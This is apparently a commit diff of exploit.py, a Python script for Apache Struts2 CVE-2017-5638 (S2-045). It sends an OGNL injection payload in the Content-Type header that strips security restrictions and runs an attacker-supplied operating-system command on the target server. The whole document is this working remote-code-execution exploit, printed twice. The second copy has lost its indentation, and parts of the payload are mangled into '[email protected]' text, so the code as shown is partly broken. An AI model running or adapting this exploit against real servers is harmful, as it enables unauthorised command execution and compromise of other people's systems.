joshbodily · January 30, 2024 18:41
diff --git a/exploit.py b/exploit.py
 # Example usage:
 # python struts.py http://localhost:8080/struts2-showcase/fileupload/upload.action "dir /p"
 #!/usr/bin/python
 # -*- coding: utf-8 -*-

 #import urllib2
 import urllib.request
 import http.client as httplib

 def exploit(url, cmd):
    payload = "%{(#_='multipart/form-data')."
    payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % cmd
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"
    try:
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        request = urllib.request.Request(url, headers=headers)
        page = urllib.request.urlopen(request)
        print(page.read().decode('utf-8'))
    except httplib.IncompleteRead as e:
        page = e.partial
        print(page)
    return page


 if __name__ == '__main__':
    import sys
    if len(sys.argv) != 3:
        print("[*] str.py <url> <cmd>")
    else:
        print('[*]CVE: 2017-5638 - Apache Struts2 S2-045')
        url = sys.argv[1]
        cmd = sys.argv[2]
        print("[*] cmd: %s\n" % cmd)
        exploit(url, cmd)
	# Example usage:
	# python struts.py http://localhost:8080/struts2-showcase/fileupload/upload.action "dir /p"
	#!/usr/bin/python
	# -- coding: utf-8 --

	#import urllib2
	import urllib.request
	import http.client as httplib

	def exploit(url, cmd):
	payload = "%{(#_='multipart/form-data')."
	payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
	payload += "(#_memberAccess?"
	payload += "(#_memberAccess=#dm):"
	payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
	payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
	payload += "(#ognlUtil.getExcludedPackageNames().clear())."
	payload += "(#ognlUtil.getExcludedClasses().clear())."
	payload += "(#context.setMemberAccess(#dm))))."
	payload += "(#cmd='%s')." % cmd
	payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
	payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
	payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
	payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
	payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
	payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
	payload += "(#ros.flush())}"
	try:
	headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
	request = urllib.request.Request(url, headers=headers)
	page = urllib.request.urlopen(request)
	print(page.read().decode('utf-8'))
	except httplib.IncompleteRead as e:
	page = e.partial
	print(page)
	return page


	if __name__ == '__main__':
	import sys
	if len(sys.argv) != 3:
	print("[*] str.py <url> <cmd>")
	else:
	print('[*]CVE: 2017-5638 - Apache Struts2 S2-045')
	url = sys.argv[1]
	cmd = sys.argv[2]
	print("[*] cmd: %s\n" % cmd)
	exploit(url, cmd)